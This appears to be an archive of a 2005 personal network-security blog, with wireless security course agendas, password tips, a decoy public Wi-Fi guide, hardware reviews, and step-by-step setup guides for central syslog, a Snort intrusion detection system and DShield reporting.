Considerations for Your Enterprise
1. Regulations Compliance
2. Data Value
3. Public Perception
Implementing Security
1. WEP
2. WPA
3. WPA2/802.11i
4. TKIP/LEAP/PEAP
5. MAC filtering
6. 802.1x
7. Bluetooth
Detecting Problems
1. Rogue AP
2. Rogue Client
3. Attacks
4. Failures
Links
Contact

Course 2 - Auditing Wireless Security

Agenda

Auditing Wireless Security
Discovery
1. Kismet
2. Netstumbler
3. GPS Mapping
Types of Attack
1. WEP
2. WPA
3. LEAP
4. Deauthentication
5. Bluetooth
Links
Contact

Wireless Overview Notes

2005-12-14T03:00:00.000-05:00

Agenda

Overview
Defining Wireless
COTS Products
Considerations for 802.11b/g
1. Frequency Interference
2. Range/Coverage
3. Speed
Configuration Example
1. Linksys WRT54G
COTS Security
1. Levels of Security
2. Need v. Complexity
3. Linksys Example
Links
Contact

Wireless Alphabet Soup

Ubiquitous Municipal Coverage Initiatives

Password Rules for Kids

2005-09-12T03:00:00.000-04:00

A decent password policy for kids and, frankly, most users.

from KidzOnline

Password Creation

Chapter 1

1. Passwords are crucial in keeping your personal information confidential and your computer system secure.

2. Sharing your passwords:

    * can allow people access to your email and other sensitive files
   * can cause you to lose access to saved files and private information

3. To be TRULY secure, every password needs to be different.

4. Use different passwords for different levels of security:

    * Level 1 – routine downloads and product registrations
   * Level 2 – e-mail accounts and operating systems
   * Level 3 – bank accounts, online auctions, administrative logins

Chapter 2

5. To ensure your password remains secret:

    * memorize your password
   * if you have to write it down, keep it on you
   * don’t leave your password where its easy to find it

6. Password basics:

    * do not share your passwords with anyone
   * make them impossible to guess
   * create different passwords
   * try to memorize your password
   * do not write them down

Creating a Vericept Instance in VMWare

2005-07-08T03:00:00.000-04:00

Here's the generic host creation VM documentation with the promiscuous NIC setup and drive conversion sections. Here's a better structure below:

Determine customer platform (Vmware version: ESX v?, workstation, gsx, etc) and total space dedicated for this VM.

Create the VM in workstation with the total space defined as the MAXIMUM. Allow for auto-expansion of the disk to maximum. This will yield about a 6 GB partition. This was done correctly the first time.

Compress this final disk image with a file utility appropriate to the receiving host machine. Windows = winzip or windows compress utility. ESX, Linux = Tar/Gzip.

Burn to disk and ship. Be ready to have this available via FTP should the disk be damaged in transit. Include a document with step-by-step installation instructions from disc to image, through conversion, into VM setup and promiscuous port settings.

On the receiving end (ESX ONLY):

copy the compressed file from DVD and uncompress/untar it to the /vmfs directory of an ESX box (handles large files well).

Run the disk conversion process.

vmkfstools –i vmhba:X:X:X:X:.vmdk

  Make sure the customer has MAX DISK SPACE _plus_ the 6GB overhead of the original disk file.  When done, delete the old 6GB file.

Create a new VM, define for Linux, name, RAM, etc., and attach the new ("existing") disk you just converted.

You previously wired the NICs, defined the virtual switches and such so you have a _separate_ production and sensing network connections and virtual switches, right? Add one virtual NIC for this VM connected to the production network's virtual switch. Add one v-NIC connected to the "sensor" v-switch (don't worry about the terminology, it works). The production network can be shared amoung the VMs. The "sensor" network can only be used by Vericept VM and needs a dedicated NIC bound to a dedicated virtual switch within VM.

Set the "sensor" NIC into promiscuous mode.

echo "PromiscuousAllowed yes" > /proc/vmware/net/vmnicX/config

Run the VM.

Test test test

*optional* Log into Paypal.com and send $10 to Drew Hunt (pinowudi@yahoo.com) for his efforts.

Take Care of Your Laptop

2005-06-22T03:00:00.000-04:00

Look at what happens when you don't take data security seriously.

from BlogSpot
http://blastradius.blogspot.com/2005/04/follow-up-professor-exaggerator.html

Linksys BEFW11S4

2005-04-24T03:00:00.006-04:00

I've been using this unit since May 2000 and it's still going strong. There was a brief time in 2003 that the wireless failed to work (just failed to transmit), but it seems to have miraculously healed itself after a couple of resets and a while on the shelf. It is currently used as my "public" AP for granting limited access to guests and passerby to dissuade them from knocking on my "private" AP.

Product Page

http://www.linksys.com/support/support.asp?spid=68

Public Wireless Diversion

2005-04-24T03:00:00.005-04:00

Many people talk of wireless security in terms of the strength of encryption. However, many access attempts into wireless resources are simply users looking for a free Internet connection. In this model of access aquisition, the intruder will often forgo even weakly secured networks for lower hanging fruit. This article explores the pursuit of wireless security by offering a more enticing target to the prospective rogue client.

Even though unsecured wireless access is highly available in populated areas, it is still pretty sparse in my corner of the States. So, to remove the temptation from the locals looking for a free ride on my production data network, I've set up a public access point for them. The following document offers my tips for a successful diversionary AP and how to ensure you aren't providing a casual hacker a backdoor into your network.

Intent

This is intended for a home setup or maybe a small business that doesn't pass sensitive data on their wireless network, but doesn't want prying eyes watching their traffic or using their AP as a SPAM relay. This is security through appeasement. To make it work, the freely available network must be more attractive than the protected wireless network. Larger businesses or those handling sensitive data should implement more robust protection for their wireless networks.

Public Access Network

AP Selection

To ensure the public network is the most succulent plum, you may want to invest in an AP that is compatible with external antennae. This would allow you to extend the coverage of the public network through the use of high-gain antennaes now available at consumer electronics stores. Having a greater coverage area, the would-be freeloader will strike the public network possibly before they are even aware of your data network. However, for this simple example, any consumer-grade access point will do.

Infrastructure Setup

The public access infrastructure will require an AP and another routing control device (read "firewall"). If you have a spare box with three NICs, look at Smoothwall (http://www.smoothwall.org) for an easy out-of-the-box solution. Some modifications to the /etc/rc.d/rc.firewallup script will be necessary to grant the outgoing access to the ORANGE ("Public access" or "DMZ") interface.

The goal here is to allow the most common forms of access without presenting major exposure. This setup will allow common web and email client access, but not email relaying, so a spammer would not be able to abuse the net and get you into trouble. This is not to say that a user wouldn't do something illegal over an approved protocol, like posting kiddie porn to a website using your network. If you are worried about these things, look at an in-line transparent proxy, like SQUID (http://www.squid-cache.org/), that can let you review where users are going and possibly limit activity you deem inappropriate.

The firewall should limit the egress (outgoing) access of the public network to only necessary protocols. Most users want some basic access to the web, their email and maybe some other apps, like instant messaging. For this example, users of the public net will be limited to web functions (HTTP - TCP 80, HTTPS - TCP 443), email (POP - TCP 110), necessities to make these two work (DNS - UDP 53), and one infrastructure service to get the correct time (NTP - UDP 123). No ingress (incoming) access should be allowed except for the requisite DNS and NTP access as they come in over UDP. Most firewalls can take care of the incoming traffic automatically as it is very common.

Connect the public AP and open the configuration interface. This is commonly a web page on the device. Set the DNS servers to those provided by your ISP. Set the DHCP service on the AP to accept a reasonable number of connections. I allow for 50 users. Set the WAN to a static IP address to the same IP subnet as your firewall interface. Set the firewall interface as the gateway. Save the settings and backup the configuration if possible. Reboot the AP. Test connecting to the AP and make sure the DNS and gateways are set correctly. Try browsing some web pages.

In this example, I've also added a "public" hub between the AP and the firewall so I can easily connect a spare box for traffic analysis with Snort (http://www.snort.org), data capture of interesting packets (tcpdump), and putting up a honeypot to see if the public net is being abused (Honeyd, LaBrea Tarpit, netcat, or whatever). These allow me to monitor and determine if the public network is being abused and may need to be taken down for a time or improvements made. This 100Mb/s half-duplex hub won't impact performance as wireless is a half-duplex communication technology that's theoretical maximum throughput (802.11g = 54Mb/s) is about half of the hub's.

Packet Snooping and Legality

Is it legal to snoop your public access network? Well, you are providing the network with no guarantees of privacy or security. Users of the network have an implicit agreement to whatever terms you impose since they did not seek prior agreement to use the net. How do you know who is using your network or what they did should your ISP accuse you of something?

This can be a very tricky subject, so snoop at your own risk. You may also want to add an in-line transparent proxy that displays a disclaimer notice on the user's first web access.

SSID & Frequency Selection

802.11b/g only has three non-overlaping channels: 1,6, and 11. The higher channels have higher frequencies, which are more susceptible to interference and attenuation with common household objects. To make your public access net attractive, you want it to have the maximum covage available so users can see it before your protected wireless net. Set the public AP to channel 1.

To ensure scanning users searching for a network understand the intent of this AP, set the SSID to "PUBLIC". This sends a clear message to passerby that this network is provided for their use and further searching/hacking is unnecessary.

Protected Data Network

AP Selection

For the private side, use an AP that provides security features appropriate for the sensitivity of the data. Linksys wireless routers provide a good mix of consumer standard protection (old WEP, WPA, WPA-PSK) as well as an outsourced RADIUS authentication scheme for more demanding environments.

Infrastructure Setup

This is up to you. You may want to monitor the network for intrusions to make sure the security scheme in place is working. However, for a home environment this is probably overkill. Just make sure that every node (computer) using the wireless network has a firewall installed and operating. See the CentralSyslog project for more on how to centrally collect logs to monitor firewall and login intrusions. Also see the SnortDocumentation project to set up a freely-available intrusion detection system for your network.

SSID & Frequency Selection

As noted for the public AP, lower frequencies carry farther than higher frequencies. This network should be size-limited to just the coverage area needed. It should also use a channel that will not interfere with the public network in such close proxmity. Since 802.11b/g networks only offer three non-overlapping channels (1,6,11) and public is using channel 1, the data network should use either channel 11 or 6. I recommend channel 11 as it has the weakest area penetration, but I've also found it is more susceptible to microwave oven interference. If your environment is susceptible to these types of interference, channel 6 may work better for you.

When setting your SSID, make it something cryptic that has meaning to you, but doesn't reveal anything about the data or owner of the AP. An example would be 5TIMdN2, for "This is my data network's second access point". The less scanning passerby know about the network, the better.

Security Options

Almost all consumer access points have basic wireless security options, like MAC filtering and basic encryption. Enable MAC filtering at the very least, identifying all of the legitimate NICs that require access to the protected network. Encryption is HIGHLY recommended as it sends a clear signal to common passerby that some effort will be needed to gain access to the network. Select a level of encryption appropriate for your data stream. I recommend WPA-PSK for typical home use as it's relatively more difficult to break than WEP, meaning more work and your public access network becomes that much more attractive. Disabling the SSID Broadcast may hide your AP from scanners for a time, but it can also cause association problems for legitimate clients using Wireless Zero Config.

Final Notes

Remember, this is security through diversion and is not designed to thwart the determined hacker. The most pertinent points I can reinforce about this strategy are make the public access point as open and attractive as possible, and make the production data network as hard to penetrate as is reasonable for your environment.

Feedback

Questions and comments can be sent to pinowudi@yahoo.com

Netgear WSG11v1 54Mbs 802.11g PCMCIA Wireless Adapter

2005-04-24T03:00:00.004-04:00

Tested with Windows XP SP2 and Fedora Core 2

This is the only wireless adapter I've owned that doesn't work in either Windows or Linux. The Linux part I can understand since it uses the wlan-ng driver set and it's mostly due to my lack of knowledge of these drivers. Windows is beyond me since it's advertised as being supported for all current versions.

The original driver loaded and worked for a few hours under the Windows Zero Configuration drivers until the laptop hibernated. On resume, the laptop froze in a blue screen of death indicating the WSG11 as the culprit. This was consistent, happening every time without fail.

Searching the Netgear http://www.netgear.com support site revealed a compatibility problem with XP SP2 and provided a beta driver (2.9.??). I downloaded it and reinstalled. The driver interface is much improved, now providing its own driver setup utility, so no more Windows Zero Config. It worked through the first hibernate, but has since caused three blue screens. It's still not production material.

SMC 2835 802.11b PCMCIA Client Adapter

2005-04-24T03:00:00.003-04:00

Tested with Windows XP and Fedora Core 2

Windows

Reception and range are excellent. Simple drivers use the integrated Windows Zero Config for configuration. No vendor-supplied interface. Works well and is simple to install.

Linux

Unfortunately, the chipset does not have a viable LINUX driver.

Intel Centrino 802.11b mini-PCI Client Adapter

2005-04-24T03:00:00.002-04:00

Tested with Windows XP on a Dell Inspiron m600

The Centrino works well on startup, but does not survive hibernation and refuses to reactivate without a reboot. Switching from Wireless Zero Config to the Intel configuration tool remedied the blue screen crashing on standby wake. The Intel tool is very well designed, with configuration for every feature of the card and WLAN discovery tools.

Cisco 340 802.11b PCMCIA Client Adapter

2005-04-24T03:00:00.001-04:00

Tested with Windows XP and Fedora Core 2

Windows

Works well with Windows when using the Cisco drivers. Ultimately configurable with respect to transmission power and power use settings.

Linux

The LINUX kernels > 2.3 have the airo_cs module precompiled, making most distributions compatible by default. This supports basic use, but is very hard to configure in any non-standard setup. I was never able to get it working with WEP encryption. I also had difficulty getting the unit to work with Kismet in rfmon mode.

Linksys WRT54G

2005-04-24T03:00:00.000-04:00

This is one of the best consumer-grade products I've seen. It has a good mix of features for security and setup with a easy-to-use web-based configuration tool. Excellent coverage and speed. Cisco also offers a buy-back program for Cisco AP upgrades which is very attractive.

Product Information

http://www.linksys.com/products/product.asp?grid=33&scid=35&prid=601

Satire on Government-Regulated Computer Security

2005-03-23T03:00:00.000-05:00

This is hilarious. I had to post it.

From DShield listservice on March 23,2005

Dear Mr. Smith,

We, the government of the United States of America, have detected an unauthorized attempt to use a file sharing application on your personal computer. According to our records, you are not licensed to execute any software applications with a security risk rating of 3 or above.

As you know, the "Computer Safety for the People" Act of 2007 prohibits individual computer users from executing potentially dangerous software applications without proper government-licensed permission. This Act was instated to keep citizens such as yourself safe from malicious computer attacks so that we can all enjoy a safer Internet. Each violation of this act could result in fines of up to $10,000 or more.

We have already given you the freedom to browse the World Wide Web and send/receive E-mail, which is all you should really need to do anyway. Because sharing files with other computer users over the Internet represents a much increased security risk, you are not permitted to do so without government authorization.

If you would like to apply for a Class 3 software license, you will need to undergo necessary computer skills training and examinations at a local government facility just like everybody else. Remember, this is not only for your own good, but for the greater good of the society.

Thank you for your cooperation.
-We the People.

-- MS (initials used to protect privacy)

Centralizing Syslogs

2005-02-22T03:00:00.000-05:00

Simple methods to setup a basic syslog server and start sending logs to it.

Tested with RedHat 7/8/9, Fedora Core 2 and Core 3

Set Up a Syslog Server

Unfortunately the /etc/sysconfig/syslog parameters don't work as I've tested, so manual editing of the /etc/rc.d/init.d/syslog is necessary. Add the "-r" option to the daemon line of the start() function.

/etc/rc.d/init.d/syslog excerpt

[...]
start() {
echo -n $"Starting system logger: "
daemon syslogd -h -r $SYSLOGD_OPTIONS
RETVAL=$?
echo
echo -n $"Starting kernel logger: "
daemon klogd $KLOGD_OPTIONS
echo
$RETVAL -eq 0 && touch /var/lock/subsys/syslog
return $RETVAL
}
[...]

Once edited, save and restart the syslog daemon.

service syslog restart

Check to see if it is listening on UDP port 514.

netstat -an | grep 514

SENDING LINUX CLIENT SYSLOGs TO THE SYSLOG SERVER

Edit the /etc/syslog.conf file to direct the syslog output with the "@" directive. In the example below, note that this syslog is recording both locally and to a remote syslog server. This ensures that the event is recorded locally at the very least if there is a network disruption that prevents communication with the central Syslog server.

/etc/syslog.conf excerpt

[...]

 # Log anything (except mail) of level info or higher.
# Don't log private authentication messages!
*.info;mail.none;authpriv.none;cron.none  /var/log/messages
*.info;mail.none;authpriv.none;cron.none  @10.x.x.x

 # The authpriv file has restricted access.
authpriv.*      /var/log/secure
authpriv.*      @10.x.x.x

[...]

Once edited, save and restart the syslog daemon.

  service syslog restart

SENDING WINDOWS CLIENT EVENT LOGS TO THE SYSLOG SERVER

Get NTSyslog from the sourceforge website. http://ntsyslog.sourceforge.net/. Install it, run the GUI control 'NTSyslogCtrl.exe' and direct the machine to the central syslog server.

AUTOMATING DEPLOYMENT

Create a folder called 'ntsyslog'. Extract the ntsyslog-1.13.zip [1] file inside that folder, creating a folder 'ntsyslog-1.13'. Create the following batch and registry files in the 'ntsyslog' folder.

NtSyslogReg

Nt Syslog Reg

REGEDIT4

HKEY_LOCAL_MACHINE\SOFTWARE\SaberNet?
"Syslog"="your.server.here"
"syslog1"="your.other.server.here"

HKEY_LOCAL_MACHINE\SOFTWARE\SaberNet\Syslog\Application?
"Information"=dword:00000000
"Information Priority"=dword:00000009
"Warning"=dword:00000001
"Warning Priority"=dword:00000009
"Error"=dword:00000001
"Error Priority"=dword:00000009
"Audit Success"=dword:00000000
"Audit Success Priority"=dword:00000009
"Audit Failure"=dword:00000001
"Audit Failure Priority"=dword:00000009

HKEY_LOCAL_MACHINE\SOFTWARE\SaberNet\Syslog\System?
"Information"=dword:00000000
"Information Priority"=dword:00000009
"Warning"=dword:00000001
"Warning Priority"=dword:00000009
"Error"=dword:00000001
"Error Priority"=dword:00000009
"Audit Success"=dword:00000000
"Audit Success Priority"=dword:00000009
"Audit Failure"=dword:00000001
"Audit Failure Priority"=dword:00000009

HKEY_LOCAL_MACHINE\SOFTWARE\SaberNet\Syslog\Security?
"Information"=dword:00000000
"Information Priority"=dword:00000009
"Warning"=dword:00000001
"Warning Priority"=dword:00000009
"Error"=dword:00000001
"Error Priority"=dword:00000009
"Audit Success"=dword:00000000
"Audit Success Priority"=dword:00000009
"Audit Failure"=dword:00000001
"Audit Failure Priority"=dword:00000009

NtSyslogBatch

Nt Syslog Batch

@echo off
cmd /c xcopy \\\\ntsyslog-1.13\* c:\ntsyslog\ /Y /S
cmd /c c:\ntsyslog\ntsyslog.exe -install
cmd /c regedit /s \\\\ntsyslog.reg
echo Syslogger will be installed at next reboot.

Resulting tree:

 ntsyslog (shared as \\server\ntsyslog)
   |
   |-------ntsyslog.reg
   |-------install_ntsyslog.bat
   |-------nysyslog-1.3
                |
                |------(NT Syslog files...)

** NOTE FOR WINXP SP2 **
Be sure to enable the NTSYSLOG application in the firewall. Otherwise the log server will receive error messages every second until it is filled (~ 20GB/day).

AUTOMATING DEPLOYMENT FOR WINDOWS 98

Same as above, only use this modified batch script.

NtSyslogBatch98

Nt Syslog Batch 98

@echo off
command /c xcopy \\\\ntsyslog-1.13\* c:\ntsyslog /Y /S
command /c c:\ntsyslog\ntsyslog.exe -install
command /c regedit /s \\\\ntsyslog.reg
echo Syslogger will be installed at next reboot.

Snort Documentation for Creating a Distributed Intusion Detection System on Fedora

2005-02-21T03:00:00.001-05:00

Tested on Fedora Core 2 and Core 3.

Central Console Setup

MySQL Database

Based on Patrick Harper's guide to Snort/Acid installation (http://www.snort.org/docs/Snort_SSL_FC2.pdf)

DATABASE INSTALLATION

If necessary, install the database package and start the service.

 yum install mysql
 service mysqld start

Download the latest SNORT package (http://www.snort.org/dl/snort-2.3.0.tar.gz) and version 2.2.0 (http://www.snort.org/dl/snort-2.2.0.tar.gz). Both will be needed to get the extra features of the database loaded.

 cd /usr/local/src
 wget http://www.snort.org/dl/snort-2.3.0.tar.gz
 wget http://www.snort.org/dl/snort-2.2.0.tar.gz
 tar xvfz snort-2.3.0.tar.gz
 tar xvfz snort-2.2.0.tar.gz

Time to make the database. If this is your first installation of MySQL, be sure to set the root password. Create a database 'snort', a user for it, and grant the appropriate permissions. **NOTE: This is lifted almost verabtim from Patrick's doc at http://www.snort.org/docs/Snort_SSL_FC2.pdf. I've modified some of the content slightly to fit this example.

 mysql
 mysql> SET PASSWORD FOR root@localhost=PASSWORD('password');
 >Query OK, 0 rows affected (0.25 sec)
 mysql> create database snort;
 >Query OK, 1 row affected (0.01 sec)
 mysql> grant INSERT,SELECT on root.* to snort@localhost;
 >Query OK, 0 rows affected (0.02 sec)
 mysql> SET PASSWORD FOR snort@localhost=PASSWORD('password_from_snort.conf');
 >Query OK, 0 rows affected (0.25 sec)
 mysql> grant CREATE, INSERT, SELECT, DELETE, UPDATE on snort.* to snort@localhost;
 >Query OK, 0 rows affected (0.02 sec)
 mysql> grant CREATE, INSERT, SELECT, DELETE, UPDATE on snort.* to snort;
 >Query OK, 0 rows affected (0.02 sec)
 mysql> exit
 >Bye

Execute the following commands to create the tables

 mysql -u root -p < /usr/local/src/snort-2.3.0/contrib/create_mysql snort
 Enter password: the mysql root password

Then install the extra DB tables using the following command

 zcat /usr/local/src/snort-2.2.0/contrib/snortdb-extra.gz |mysql -p snort
 Enter password: the mysql root password

Now you need to check and make sure that the Snort DB was created correctly

 mysql -p
 >Enter password:
 mysql> SHOW DATABASES;

(You should see the following)

+------------+
| Database
+------------+
| mysql
| Snort
| test
+------------+
3 rows in set (0.00 sec)

 mysql> use Snort
 >Database changed mysql> SHOW TABLES;

 mysql> exit

BASE Analytics

Based on Patrick Harper's guide to Snort/Acid installation (http://www.snort.org/docs/Snort_SSL_FC2.pdf)

BASE INSTALLATION

If necessary, install the web server package and start the service.

 yum install httpd
 service httpd start

Download the latest JPGraph (http://www.aditus.nu/jpgraph/jpdownload.php) and ADODB (http://phplens.com/lens/dl/adodb453.tgz) packages. Unpack and install them. This example assumes a default web root at /var/www/html.

 cd /usr/local/src
 wget http://phplens.com/lens/dl/adodb453.tgz
 wget http://members.chello.se/jpgraph/jpgdownloads/jpgraph-1.17.tar.gz
 tar xvfz adodb453.tgz
 tar xvfz jpgraph-1.17.tar.gz
 mv adodb /var/www/
 mv jpgraph-1.17 /var/www/
 ln -s /var/www/jpgraph-1.17 /var/www/jpgraph

Download BASE (http://www.snort.org/dl/contrib/data_analysis/BASE/) from the snort website and unpack it.

 wget http://www.snort.org/dl/contrib/data_analysis/BASE/base-1.0.tar.gz
 tar xvfz base-1.0.tar.gz
 mv base /var/www/html/

Create the BASE configuration file and define the variables.

 cd /var/www/html/base
 cp base_conf.php.dist base_conf.php
 vi base_conf.php
   Set $BASE_urlpath to the web path used to access BASE
   $BASE_urlpath = "http:///base";
   set $DBlib_path to the ADODB path
   $DBlib_path = "/var/www/adodb";
   set $DBtype to the MySQL
   $DBtype = "mysql";
   set the alert and archive databases to their requisite database and access settings.
   set $ChartLib_path to the JPGraph path
   $ChartLib_path = "/var/www/jpgraph/src";
   Save and exit

Open a browser and navigate to your site. On first access, BASE will ask to install the requisite tables and alert data into the database. Press the Setup button. On successive accesses, this will already exist and BASE will go straight to the analytics page.

 http:///base

Centralized Rule & Configuration Distribution

CREATE A CENTRALIZED DISTRIBUTION WEB SERVER

This is a very insecure setup and is not intended for a public-facing server. Only use this for an internal server. Please use appropriate security precautions.

These examples assume a default webroot installation at /var/www/html.

If necessary, install the web package and start the service.

 yum install httpd
 service httpd start

Create a 'snort' directory and subdirectories.

 cd /var/www/html
 mkdir -p snort/rules
 mkdir -p snort/bleedingedge
 mkdir -p snort/oinkmaster
 mkdir -p snort/rpm
 mkdir -p snort/config
 cd snort

Get the basic packages needed to create a drone. This snort_mirror.sh sample script will pull mirrors of the relavent rule files from snort.org and bleedingsnort.org.

 /usr/local/bin/snort_mirror.sh

Schedule the mirror script to be run with cron.

 crontab -e
 0 5 * * * /usr/local/bin/snort_mirror.sh;

Fill in the config and rpm directories. These are the master files. Use the RPMS from the SensorInstallation process.

 cd /var/www/html/snort/rpm
 cp /usr/src/redhat/RPMS/i386/snort-2.3.0-0.fdr.1.i386.rpm .
 cp /usr/src/redhat/RPMS/i386/snort-debuginfo-2.3.0-0.fdr.1.i386.rpm .
 cp /usr/src/redhat/RPMS/i386/snort-mysql-2.3.0-0.fdr.1.i386.rpm .
 cd ../config
 cp /etc/oinkmaster.conf .

Change oinkmaster.conf to point to http:///snort/rules/snort-snapshot-2_3.tar.gz.

***Note, this file contains passwords that grant access to the snort database. Perhaps an encrypted transport would be better.

 cp /etc/snort/snort.conf .

Populate oinkmaster for distribution. Use the oinkmaster files from the OinkmasterRuleUpdates process.

 cd /var/www/html/snort/oinkmaster
 cp /usr/local/src/oinkmaster/oinkmaster.pl .
 cp /usr/local/bin/oinkmaster.sh .

Change the oinkmaster.sh file to point to http:///snort/bleedingedge/bleeding.rules.tar.gz.

USING THE CENTRAL SERVER

From the sensor machine, get the files needed to install the snort drone and install. Or just run this drone_install.sh script for all of the below steps.

 cd /usr/local/src
 wget http:///snort/rpm/snort-2.3.0-0.fdr.1.i386.rpm
 wget http:///snort/rpm/snort-debuginfo-2.3.0-0.fdr.1.i386.rpm
 wget http:///snort/rpm/snort-mysql-2.3.0-0.fdr.1.i386.rpm
 rpm -ivh snort-2.3.0-0.fdr.1.i386.rpm snort-mysql-2.3.0-0.fdr.1.i386.rpm snort-debuginfo-2.3.0-0.fdr.1.i386.rpm

On the drone, set up oinkmaster.

 cd /etc
 wget http:///snort/config/oinkmaster.conf
 cd /usr/local/bin
 wget http:///snort/oinkmaster/oinkmaster.pl
 wget http:///snort/oinkmaster/oinkmaster.sh

Set up the snort files.

 cd /etc/rc.d/init.d
 wget http:///snort/config/snortd
 cd /etc/snort
 wget http:///snort/config/snort.conf
 cd /etc/sysconfig
 wget http:///snort/config/snort

Set it up for boot and run it.

 chkconfig snortd on
 service snortd start

Check the log for errors.

 cat /var/log/messages | grep snort

UPDATING THE DRONES

A cron job will need to be set up to automatically update the configuration files, rules, and restart snort. The job will need to retrieve oinkmaster and snort configuration changes and update the rules. It will then need to restart snort for the changes to take effect. A cron job like this drone_update.sh script should do the trick. This will be run as root because of the service restart at the end, which needs root privileges. Only make changes to the master server if you've thoroughly tested the effect in a comparably configured test drone or you'll run the risk of killing all of the sensors!

 crontab -e
   15 2 * * * /usr/local/bin/drone_update.sh

Sensor Installation

SENSOR INSTALLATION

Install these packages to satisfy dependancies.

 yum install mysql
 yum install mysql-devel
 yum install pcre
 yum install pcre-devel

Download the latest PCRE package from http://www.pcre.org. This will provide the libpcre.h file required for the RPM build. Current version tested with is version 5.0.

 cd /usr/local/src
 wget http:///sourceforge/pcre/pcre-5.0.tar.gz

Untar, build and install.

 tar xvfz /usr/local/src/pcre-5.0.tar.gz
 cd pcre-5.0
 ./configure
 make
 make check
 make install

Download the snort source from http://www.snort.org. Current version tested with is version 2.3.0.

 wget http://www.snort.org/dl/snort-2.3.0.tar.gz

Untar the archive and enter the directory.

 tar xvfz /usr/local/src/snort-2.3.0.tar.gz
 cd snort-2.3.0

Configure and make the source files.

 ./configure
 make
 make check

Change to the 'rpm' directory. Create the RPMS for install.

 cd rpm
 rpmbuild --with fedora --with mysql -ta /usr/local/src/snort-2.3.0.tar.gz

Install the RPMS.

 rpm -ivh /usr/src/redhat/RPMS/i386/snort-2.3.0-0.fdr.1.i386.rpm /usr/src/redhat/RPMS/i386/snort-debuginfo-2.3.0-0.fdr.1.i386.rpm /usr/src/redhat/RPMS/i386/snort-mysql-2.3.0-0.fdr.1.i386.rpm

The RedHat-compliant setup makes some assumptions that need to be fixed. Edit the daemon startup script in /etc/rc.d/init.d and remove the $ALERTMODE variable from each start line.

 cd /etc/rc.d/init.d
 vi snortd
  Remove $ALERTMODE from the start() function calls and save.

Edit the snort configuration file. Add an output for the database.

 cd /etc/snort
 vi snort.conf
  Change the HOME_NET variable to your public IP address
  Add the line "output database: log, mysql, user=snort password= dbname=snort host=" to section 3.

  **OPTIONAL: DSHIELD**
  You may want to add "output alert_syslog: LOG_AUTH LOG_ALERT" for use with DShield parsing scripts.
  Save and exit.

Test snort.

 snort -T -c /etc/snort/snort.conf

If all is well, change the ownership to the snort user. This will make life easier later.

 chown -R snort:snort /var/log/snort /etc/snort

Add snort to the startup regimen and start the service.

 chkconfig snortd add
 service snortd start

Final check: check syslog for successful startup messages.

 cat /var/log/messages | grep snort

Oinkmaster Rule Updates

OINKMASTER INSTALLATION

Get the latest script from the snort website (http://www.snort.org/dl/contrib/rule_management/oinkmaster/). Untar it.

 cd /usr/local/src
 wget http://www.snort.org/dl/contrib/rule_management/oinkmaster/oinkmaster-1.1.tar.gz
 tar xvfz oinkmaster-1.1.tar.gz
 ln -s oinkmaster-1.1 oinkmaster
 cd oinkmaster

Install the script into one of the local binary directories. I prefer /usr/local/bin.

 cp oinkmaster.pl /usr/local/bin

Modify and install the configuration file.

 vi oinkmaster.conf
  Set url to the path of your snort version
  url = http://www.snort.org/dl/rules/snortrules-snapshot-2_3.tar.gz
  Save and exit.
 cp oinkmaster.conf /etc/

To add some additional functionality to oinkmaster, you might want to write a script. This would allow for updates from multiple sites (say Bleeding Edge and Snort.org), mail notification, logging and so forth. Here's my sample oinkmaster.sh script.

 wget http://www.hunt-family.net/oinkmaster.sh
 vi oinkmaster.sh
  Change the email address to your own.
  Save and exit.
 cp oinkmaster.sh /usr/local/bin

Schedule the script to run at a time of your choosing with cron, preferably as the 'snort' user.

 crontab -e -u snort
  07 01 * * * /usr/local/bin/oinkmaster.sh
  Save and exit.

D-Shield Integration

Integrating Snort with DShield for Automated Reporting of Violators to ISPs.

OVERVIEW

DShield is an organization dedicated to monitoring Internet threats from the same folks that update the Internet Storm Center (http://isc.sans.org). In fact, much of the data presented on the Internet Storm Center is from the DShield collaborative. For more information or reasons why you should contribute to DShield, visit thier site at http://dshield.org.

GET THE SCRIPTS

Navigate to http://www.dshield.org/howto.php and download the client of choice. For this example, I've used the "Linux 2.4x iptables," "Snort 1.8," and "Snort Portscan" clients.

 cd /usr/local/src
 wget http://www.dshield.org/clients/framework/iptables.tar.gz
 wget http://www.dshield.org/clients/framework/snort_portscan.tar.gz
 wget http://www.dshield.org/clients/framework/snort_18_syslog.tar.gz

REGISTER ON THE SITE

Click the "Signup" link on the home page. This allows you to receive a nicely formatted daily report on the attacks/scans you have submitted. Registration for the Fightback program is optional, but recommended. This gives the DShield organization permission to submit abuse complaints to ISPs on your behalf.

CONFIGURE AND TEST

Untar the archives.

 tar xvfz iptables.tar.gz
 tar xfvz snort_18_syslog.tar.gz
 tar xvfz snort_portscan.tar.gz

Enter the iptables directory and edit the test.cnf file to fit your environment. Change the "whereto=" line to "whereto=./output.txt". To test the mail delivery of the output, uncomment and enter your email address and local sendmail command. The default is usually sufficient. NOTE: An MTA must be running on the host running the script. Run the test wrapper and review the results in output.txt and debug.txt.

 cd iptables
 vi test.cnf
  Change 'whereto=' to a local output file.
  Change the email information and enable the sendmail command.
  Save and exit.
 ./test_wrapper.sh

The script should run and deliver output to the local 'output.txt' file. Check it to see if the iptables denials were dumped correctly. To see how the process worked, look at the debug.txt file as well.

 cat output.txt
 cat debug.txt

If satisfactory, repeat for the snort and snort portscan scripts. Each of these should read from the /var/log/messages file for different lines. Check your email to see if the email messages delivered properly.

SETTING UP A COMMON CONFIGURATION SET FOR MULTIPLE SCRIPTS

Create a configuration directory under /etc. Populate it with the source and target exclude files. Also copy the production configuration file.

 cd /usr/local/src/iptables
 mkdir /etc/dshield
 cp *.lst dshield.cnf /etc/dshield/

Now modify the exclude files. The source-exclude file should include your private network ranges and any testing Internet servers you may use. The other exclude files are typically fine as they are.

 cd /etc/dshield
 mv dshield.cnf dshield_iptables.cnf
 vi dshield-source-exclude.lst
  I added GRC Shields Up! scanner to my exclude list since I use it to do most of my Internet-based port scanning.
  Save and exit.

Edit the configuration file for production script use. Enter your email and the user id you received when you registered at the DShield site. Leave the 'to=' field as it is. If you would like to receive a copy of what the script submits, add your email to the 'cc=' line. Set 'whereto=' to 'whereto=MAIL'. Change the path in the 'source_exclude=', 'source_port_exclude', 'target_exclude' and 'target_port_exclude' variables to /etc/dshield/(filename). Make sure 'obfus=N' to use the Fightback service. Set 'verbose=N', but change 'debug=Y' for use as a transcript file later in a later step.

 cp dshield.cnf dshield_iptables.cnf
 vi dshield_iptables.cnf
  Edit the variables as described above:
   from=
   userid=
   to=report@dshield.org
